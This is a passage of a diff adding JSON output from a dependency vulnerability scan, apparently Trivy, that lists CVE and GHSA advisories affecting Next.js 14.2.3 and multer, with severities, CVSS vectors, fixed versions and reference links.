"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-3520", + "https://cna.openjsf.org/security-advisories.html", + "https://github.com/expressjs/multer", + "https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752", + "https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2", + "https://nvd.nist.gov/vuln/detail/CVE-2026-3520", + "https://www.cve.org/CVERecord?id=CVE-2026-3520" + ], + "PublishedDate": "2026-03-04T17:16:22.61Z", + "LastModifiedDate": "2026-03-09T18:03:23.1Z" + }, + { + "VulnerabilityID": "CVE-2025-29927", + "VendorIDs": [ + "GHSA-f82v-jwr5-mffw" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "13.5.9, 14.2.25, 15.2.3, 12.3.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-29927", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:03d8bc467ed49d9b588625219e50e54133acdb9c588237ee693b8aa0098d1007", + "Title": "nextjs: Authorization Bypass in Next.js Middleware", + "Description": "Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.", + "Severity": "CRITICAL", + "CweIDs": [ + "CWE-285", + "CWE-863" + ], + "VendorSeverity": { + "ghsa": 4, + "redhat": 4 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", + "V3Score": 9.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", + "V3Score": 9.1 + } + }, + "References": [ + "http://www.openwall.com/lists/oss-security/2025/03/23/3", + "http://www.openwall.com/lists/oss-security/2025/03/23/4", + "https://access.redhat.com/security/cve/CVE-2025-29927", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/commit/52a078da3884efe6501613c7834a3d02a91676d2", + "https://github.com/vercel/next.js/commit/5fd3ae8f8542677c6294f32d18022731eab6fe48", + "https://github.com/vercel/next.js/releases/tag/v12.3.5", + "https://github.com/vercel/next.js/releases/tag/v13.5.9", + "https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw", + "https://jfrog.com/blog/cve-2025-29927-next-js-authorization-bypass/", + "https://nvd.nist.gov/vuln/detail/CVE-2025-29927", + "https://security.netapp.com/advisory/ntap-20250328-0002", + "https://security.netapp.com/advisory/ntap-20250328-0002/", + "https://vercel.com/changelog/vercel-firewall-proactively-protects-against-vulnerability-with-middleware", + "https://www.cve.org/CVERecord?id=CVE-2025-29927" + ], + "PublishedDate": "2025-03-21T15:15:42.66Z", + "LastModifiedDate": "2025-09-10T15:49:40.637Z" + }, + { + "VulnerabilityID": "CVE-2024-46982", + "VendorIDs": [ + "GHSA-gp8f-8m3g-qvj9" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "13.5.7, 14.2.10", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-46982", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:8ae6ee9f6abad6c253892c7eafdf3857ac92ffe851cb6c9568fa46323bbc7084", + "Title": "Next.js Cache Poisoning", + "Description": "Next.js is a React framework for building full-stack web applications. By sending a crafted HTTP request, it is possible to poison the cache of a non-dynamic server-side rendered route in the pages router (this does not affect the app router). When this crafted request is sent it could coerce Next.js to cache a route that is meant to not be cached and send a `Cache-Control: s-maxage=1, stale-while-revalidate` header which some upstream CDNs may cache as well. To be potentially affected all of the following must apply: 1. Next.js between 13.5.1 and 14.2.9, 2. Using pages router, \u0026 3. Using non-dynamic server-side rendered routes e.g. `pages/dashboard.tsx` not `pages/blog/[slug].tsx`. This vulnerability was resolved in Next.js v13.5.7, v14.2.10, and later. We recommend upgrading regardless of whether you can reproduce the issue or not. There are no official or recommended workarounds for this issue, we recommend that users patch to a safe version.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-639" + ], + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V3Score": 7.5, + "V40Score": 8.7 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/commit/7ed7f125e07ef0517a331009ed7e32691ba403d3", + "https://github.com/vercel/next.js/commit/bd164d53af259c05f1ab434004bcfdd3837d7cda", + "https://github.com/vercel/next.js/security/advisories/GHSA-gp8f-8m3g-qvj9", + "https://nvd.nist.gov/vuln/detail/CVE-2024-46982" + ], + "PublishedDate": "2024-09-17T22:15:02.273Z", + "LastModifiedDate": "2025-09-10T15:46:05.173Z" + }, + { + "VulnerabilityID": "CVE-2024-51479", + "VendorIDs": [ + "GHSA-7gfc-8cq8-jh5f" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "14.2.15", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-51479", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:ffe1fe8cd242722c48ed9d1d21d64c4678d5fece8d35a42fb15072938ea11c55", + "Title": "next.js: next: authorization bypass in Next.js", + "Description": "Next.js is a React framework for building full-stack web applications. In affected versions if a Next.js application is performing authorization in middleware based on pathname, it was possible for this authorization to be bypassed for pages directly under the application's root directory. For example: * [Not affected] `https://example.com/` * [Affected] `https://example.com/foo` * [Not affected] `https://example.com/foo/bar`. This issue is patched in Next.js `14.2.15` and later. If your Next.js application is hosted on Vercel, this vulnerability has been automatically mitigated, regardless of Next.js version. There are no official workarounds for this vulnerability.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-285", + "CWE-863" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2024-51479", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/commit/1c8234eb20bc8afd396b89999a00f06b61d72d7b", + "https://github.com/vercel/next.js/releases/tag/v14.2.15", + "https://github.com/vercel/next.js/security/advisories/GHSA-7gfc-8cq8-jh5f", + "https://nvd.nist.gov/vuln/detail/CVE-2024-51479", + "https://www.cve.org/CVERecord?id=CVE-2024-51479" + ], + "PublishedDate": "2024-12-17T19:15:06.697Z", + "LastModifiedDate": "2025-09-10T15:48:08.253Z" + }, + { + "VulnerabilityID": "CVE-2026-44573", + "VendorIDs": [ + "GHSA-36qx-fr4f-26g5" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.5.16, 16.2.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44573", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:bd9906f4d5b485ab232b2dbc5a0fba6ec53cd6439edf9b78c2790429b6f3bb2d", + "Title": "Next.js has a Middleware / Proxy bypass in Pages Router applications using i18n", + "Description": "Next.js is a React framework for building full-stack web applications. From 12.2.0 to before 15.5.16 and 16.2.5, Applications using the Pages Router with i18n configured and middleware/proxy-based authorization can allow unauthorized access to protected page data through locale-less /_next/data/\u003cbuildId\u003e/\u003cpage\u003e.json requests. In affected configurations, middleware does not run for the unprefixed data route, allowing an attacker to retrieve SSR JSON for protected pages without passing the intended authorization checks. This vulnerability is fixed in 15.5.16 and 16.2.5.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-863" + ], + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/releases/tag/v15.5.16", + "https://github.com/vercel/next.js/releases/tag/v16.2.5", + "https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5", + "https://nvd.nist.gov/vuln/detail/CVE-2026-44573" + ], + "PublishedDate": "2026-05-13T17:16:22.627Z", + "LastModifiedDate": "2026-05-14T12:24:22.91Z" + }, + { + "VulnerabilityID": "CVE-2026-44578", + "VendorIDs": [ + "GHSA-c4j6-fc7j-m34r" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.5.16, 16.2.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44578", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:4b00929401561b3189dd6335cdbb89b9957345f4d80a9420d54dbe8defe083a4", + "Title": "Next.js vulnerable to server-side request forgery in applications using WebSocket upgrades", + "Description": "Next.js is a React framework for building full-stack web applications. From 13.4.13 to before 15.5.16 and 16.2.5, self-hosted applications using the built-in Node.js server can be vulnerable to server-side request forgery through crafted WebSocket upgrade requests. An attacker can cause the server to proxy requests to arbitrary internal or external destinations, which may expose internal services or cloud metadata endpoints. Vercel-hosted deployments are not affected. This vulnerability is fixed in 15.5.16 and 16.2.5.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-918" + ], + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", + "V3Score": 8.6 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/releases/tag/v15.5.16", + "https://github.com/vercel/next.js/releases/tag/v16.2.5", + "https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r", + "https://nvd.nist.gov/vuln/detail/CVE-2026-44578" + ], + "PublishedDate": "2026-05-13T18:16:17.99Z", + "LastModifiedDate": "2026-05-14T18:34:38.53Z" + }, + { + "VulnerabilityID": "GHSA-5j59-xgg2-r9c4", + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "14.2.35, 15.0.7, 15.1.11, 15.2.8, 15.3.8, 15.4.10, 15.5.9, 15.6.0-canary.60, 16.0.10, 16.1.0-canary.19", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://github.com/advisories/GHSA-5j59-xgg2-r9c4", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:c465b7761effe6b822ac2a802014aa01002d62640427a73b62a2a571e081fe24", + "Title": "Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up", + "Description": "It was discovered that the fix for [CVE-2025-55184](https://github.com/advisories/GHSA-2m3v-v2m8-q956) in React Server Components was incomplete and did not fully mitigate denial-of-service conditions across all payload types. As a result, certain crafted inputs could still trigger excessive resource consumption. \n\nThis vulnerability affects React versions 19.0.2, 19.1.3, and 19.2.2, as well as frameworks that bundle or depend on these versions, including Next.js 13.x, 14.x, 15.x, and 16.x when using the App Router. The issue is tracked upstream as [CVE-2025-67779](https://www.cve.org/CVERecord?id=CVE-2025-67779).\n\nA malicious actor can send a specially crafted HTTP request to a Server Function endpoint that, when deserialized, causes the React Server Components runtime to enter an infinite loop. This can lead to sustained CPU consumption and cause the affected server process to become unresponsive, resulting in a denial-of-service condition in unpatched environments.", + "Severity": "HIGH", + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/security/advisories/GHSA-5j59-xgg2-r9c4", + "https://nextjs.org/blog/security-update-2025-12-11", + "https://nvd.nist.gov/vuln/detail/CVE-2025-67779", + "https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components", + "https://www.cve.org/CVERecord?id=CVE-2025-55184", + "https://www.facebook.com/security/advisories/cve-2025-67779" + ], + "PublishedDate": "2025-12-12T17:21:57Z", + "LastModifiedDate": "2026-01-15T21:55:04Z" + }, + { + "VulnerabilityID": "GHSA-8h8q-6873-q5fj", + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.5.16, 16.2.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://github.com/advisories/GHSA-8h8q-6873-q5fj", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:92e1aa37bcc2db1c15708088885b76cf9ca9d3d8c1fc2283d064ff5d037c3529", + "Title": "Next.js Vulnerable to Denial of Service with Server Components", + "Description": "A vulnerability affects certain React Server Components packages for versions 19.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23870](https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh). \n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage. This can result in denial of service in unpatched environments.", + "Severity": "HIGH", + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj", + "https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-w94c-4vhp-22gx", + "https://nvd.nist.gov/vuln/detail/CVE-2026-23870" + ], + "PublishedDate": "2026-05-11T14:50:27Z", + "LastModifiedDate": "2026-05-11T14:50:27Z" + }, + { + "VulnerabilityID": "GHSA-h25m-26qc-wcjf", + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.0.8, 15.1.12, 15.2.9, 15.3.9, 15.4.11, 15.5.10, 15.6.0-canary.61, 16.0.11, 16.1.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://github.com/advisories/GHSA-h25m-26qc-wcjf", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:ff28fec564d432dbea049c0723e9e41bc233533a7d1c711b172100b98425733b", + "Title": "Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components", + "Description": "A vulnerability affects certain React Server Components packages for versions 19.0.x, 19.1.x, and 19.2.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23864](https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg).\n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage, out-of-memory exceptions, or server crashes. This can result in denial of service in unpatched environments.", + "Severity": "HIGH", + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/security/advisories/GHSA-h25m-26qc-wcjf", + "https://nvd.nist.gov/vuln/detail/CVE-2026-23864", + "https://vercel.com/changelog/summary-of-cve-2026-23864" + ], + "PublishedDate": "2026-01-28T15:38:01Z", + "LastModifiedDate": "2026-01-28T15:38:01Z" + }, + { + "VulnerabilityID": "GHSA-mwv6-3258-q52c", + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "14.2.34, 15.0.6, 15.1.10, 15.2.7, 15.3.7, 15.4.9, 15.5.8, 15.6.0-canary.59, 16.0.9, 16.1.0-canary.17", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://github.com/advisories/GHSA-mwv6-3258-q52c", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:618188aa35b0d11fb0379e3452fe5b242450d218f40d168c6f6557825e95070a", + "Title": "Next Vulnerable to Denial of Service with Server Components", + "Description": "A vulnerability affects certain React packages for versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55184](https://www.cve.org/CVERecord?id=CVE-2025-55184).\n\nA malicious HTTP request can be crafted and sent to any App Router endpoint that, when deserialized, can cause the server process to hang and consume CPU. This can result in denial of service in unpatched environments.", + "Severity": "HIGH", + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/security/advisories/GHSA-mwv6-3258-q52c", + "https://nextjs.org/blog/security-update-2025-12-11", + "https://www.cve.org/CVERecord?id=CVE-2025-55184" + ], + "PublishedDate": "2025-12-11T22:49:27Z", + "LastModifiedDate": "2025-12-11T22:49:28Z" + }, + { + "VulnerabilityID": "GHSA-q4gf-8mx6-v5v3", + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.5.15, 16.2.3", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://github.com/advisories/GHSA-q4gf-8mx6-v5v3", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:da8071eff38bff6de90b2e9abbd23b85c6d34bf93862a462071e7b8a1af9dee8", + "Title": "Next.js has a Denial of Service with Server Components", + "Description": "A vulnerability affects certain React Server Components packages for versions 19.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23869](https://github.com/facebook/react/security/advisories/GHSA-479c-33wc-g2pg). You can read more about this advisory our [this changelog](https://vercel.com/changelog/summary-of-cve-2026-23869).\n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage. This can result in denial of service in unpatched environments.", + "Severity": "HIGH", + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/security/advisories/GHSA-q4gf-8mx6-v5v3", + "https://vercel.com/changelog/summary-of-cve-2026-23869" + ], + "PublishedDate": "2026-04-10T15:35:47Z", + "LastModifiedDate": "2026-04-10T15:35:47Z" + }, + { + "VulnerabilityID": "CVE-2024-47831", + "VendorIDs": [ + "GHSA-g77x-44xx-532m" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "14.2.7", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-47831", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:870deb891342fbe836ab949cbe906351d888b979160e220ba5de55491995cc81", + "Title": "next.js: Next.js image optimization has Denial of Service condition", + "Description": "Next.js is a React Framework for the Web. Cersions on the 10.x, 11.x, 12.x, 13.x, and 14.x branches before version 14.2.7 contain a vulnerability in the image optimization feature which allows for a potential Denial of Service (DoS) condition which could lead to excessive CPU consumption. Neither the `next.config.js` file that is configured with `images.unoptimized` set to `true` or `images.loader` set to a non-default value nor the Next.js application that is hosted on Vercel are affected. This issue was fully patched in Next.js `14.2.7`. As a workaround, ensure that the `next.config.js` file has either `images.unoptimized`, `images.loader` or `images.loaderFile` assigned.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-674" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U", + "V3Score": 5.9, + "V40Score": 4.6 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2024-47831", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/commit/d11cbc9ff0b1aaefabcba9afe1e562e0b1fde65a", + "https://github.com/vercel/next.js/security/advisories/GHSA-g77x-44xx-532m", + "https://nvd.nist.gov/vuln/detail/CVE-2024-47831", + "https://www.cve.org/CVERecord?id=CVE-2024-47831" + ], + "PublishedDate": "2024-10-14T18:15:05.013Z", + "LastModifiedDate": "2024-11-08T15:39:21.823Z" + }, + { + "VulnerabilityID": "CVE-2024-56332", + "VendorIDs": [ + "GHSA-7m27-7ghc-44w9" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "13.5.8, 14.2.21, 15.1.2", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-56332", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:0901356f7f4fa09450af3a433f9f257bcba669b0b1a39982832d1306434411e5", + "Title": "next.js: Next.js Vulnerable to Denial of Service (DoS) with Server Actions", + "Description": "Next.js is a React framework for building full-stack web applications. Starting in version 13.0.0 and prior to versions 13.5.8, 14.2.21, and 15.1.2, Next.js is vulnerable to a Denial of Service (DoS) attack that allows attackers to construct requests that leaves requests to Server Actions hanging until the hosting provider cancels the function execution. This vulnerability can also be used as a Denial of Wallet (DoW) attack when deployed in providers billing by response times. (Note: Next.js server is idle during that time and only keeps the connection open. CPU and memory footprint are low during that time.). Deployments without any protection against long running Server Action invocations are especially vulnerable. Hosting providers like Vercel or Netlify set a default maximum duration on function execution to reduce the risk of excessive billing. This is the same issue as if the incoming HTTP request has an invalid `Content-Length` header or never closes. If the host has no other mitigations to those then this vulnerability is novel. This vulnerability affects only Next.js deployments using Server Actions. The issue was resolved in Next.js 13.5.8, 14.2.21, and 15.1.2. We recommend that users upgrade to a safe version. There are no official workarounds.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-770" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2024-56332", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/security/advisories/GHSA-7m27-7ghc-44w9", + "https://nvd.nist.gov/vuln/detail/CVE-2024-56332", + "https://www.cve.org/CVERecord?id=CVE-2024-56332" + ], + "PublishedDate": "2025-01-03T21:15:13.55Z", + "LastModifiedDate": "2025-09-10T15:48:41.83Z" + }, + { + "VulnerabilityID": "CVE-2025-55173", + "VendorIDs": [ + "GHSA-xv57-4mr9-wg8v" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "14.2.31, 15.4.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-55173", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:4f427324d504eade5234a30344e36974820c0e709bf9b4e93f269dc3d12b445e", + "Title": "nextjs: Next.js Content Injection Vulnerability for Image Optimization", + "Description": "Next.js is a React framework for building full-stack web applications. In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization is vulnerable to content injection. The issue allowed attacker-controlled external image sources to trigger file downloads with arbitrary content and filenames under specific configurations. This behavior could be abused for phishing or malicious file delivery. This vulnerability has been fixed in Next.js versions 14.2.31 and 15.4.5.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-20" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", + "V3Score": 4.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", + "V3Score": 4.3 + } + }, + "References": [ + "http://vercel.com/changelog/cve-2025-55173", + "https://access.redhat.com/security/cve/CVE-2025-55173", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd", + "https://github.com/vercel/next.js/security/advisories/GHSA-xv57-4mr9-wg8v", + "https://nvd.nist.gov/vuln/detail/CVE-2025-55173", + "https://vercel.com/changelog/cve-2025-55173", + "https://www.cve.org/CVERecord?id=CVE-2025-55173" + ], + "PublishedDate": "2025-08-29T22:15:31.75Z", + "LastModifiedDate": "2025-09-08T16:42:57.183Z" + }, + { + "VulnerabilityID": "CVE-2025-57752", + "VendorIDs": [ + "GHSA-g5qg-72qw-gw5v" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "14.2.31, 15.4.5", + 